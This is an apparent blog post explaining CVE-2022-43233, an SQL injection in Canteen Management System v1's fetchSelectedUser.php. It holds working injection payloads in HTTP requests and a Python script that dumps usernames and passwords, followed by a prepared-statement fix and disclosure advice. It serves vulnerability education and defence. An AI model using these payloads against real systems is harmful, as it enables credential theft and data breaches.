CVE-2022-43233 is a critical SQL Injection vulnerability discovered in the Canteen Management System v1., an open-source web application widely used by schools and organizations to handle canteen operations. The issue affects the userid parameter in the file /php_action/fetchSelectedUser.php, allowing attackers to run arbitrary SQL commands on the database. This post will break down the vulnerability, show you exploitation techniques with code snippets, and discuss ways you can protect your system. This is a unique step-by-step breakdown designed for easy comprehension.
Original References
- CVE Record: https://nvd.nist.gov/vuln/detail/CVE-2022-43233
- Exploit Proof: Packet Storm Report
- Original Source Code: Canteen Management System v1.
Vulnerability Overview
When an insecure application takes user input and places it directly into an SQL query without any kind of sanitization, it becomes susceptible to SQL injection. Attackers can use this opportunity to execute their own commands against the database, which may include dumping sensitive data or changing entries.
In the context of the Canteen Management System v1., the vulnerable script /php_action/fetchSelectedUser.php retrieves the userid from user input and passes it directly into a SQL statement:
// Rough snippet from fetchSelectedUser.php
$user_id = $_POST['userid'];
$sql = "SELECT * FROM users WHERE user_id = $user_id";
$result = $conn->query($sql);
Notice how $user_id is not validated or sanitized—that’s the root of the problem.
Proof of Concept (PoC) Exploit
Let’s walk through a simple attack using a POST request. A hacker could send specially crafted data like this:
POST /php_action/fetchSelectedUser.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
userid=1 OR 1=1
Expected SQL Query
SELECT * FROM users WHERE user_id = 1 OR 1=1
This query will *always* return all users, since 1=1 is always true.
More Dangerous Exploit: Dumping Passwords
A skilled attacker could use UNION injection to try and list all usernames and passwords.
POST /php_action/fetchSelectedUser.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
userid= UNION SELECT 1, username, password, 4 FROM users--
If the users table contains columns (id, username, password, role), the script may dump usernames and passwords to the page intended for displaying user details.
Here’s a very basic Python snippet using requests to automate this attack
import requests
url = 'http://target-site.com/php_action/fetchSelectedUser.php';
data = {'userid': " UNION SELECT 1, username, password, 4 FROM users--"}
r = requests.post(url, data=data)
print(r.text) # This will print the page, possibly showing usernames and hashed passwords
Remediation and Prevention
- ALWAYS use prepared statements (parameterized queries) instead of concatenating user input into SQL.
Fixed code example using prepared statements (MySQLi)
$user_id = $_POST['userid'];
$stmt = $conn->prepare("SELECT * FROM users WHERE user_id = ?");
$stmt->bind_param("i", $user_id);
$stmt->execute();
$result = $stmt->get_result();
Data breach. Exposes confidential user information.
- Account compromise. Attackers can get admin usernames and hashed (possibly even plaintext) passwords.
Disclosing CVE-2022-43233
Responsible disclosure practices recommend contacting the vendor/developer. Canteen Management System is hosted on SourceCodester; issues should be reported through their site or GitHub repo if available.
Conclusion
SQL Injection flaws like CVE-2022-43233 are extremely dangerous but also easily avoided by using prepared statements. Given the sensitive nature of the Canteen Management System (handling user and payment info), patching and updating systems is crucial.
If you use Canteen Management System v1., you should update the affected scripts immediately and audit for similar issues elsewhere in your codebase.
Further Reading
- OWASP SQL Injection
- SQL Injection Prevention Cheat Sheet
- Canteen Management System Source Page
Timeline
Published on: 10/28/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:48:00 UTC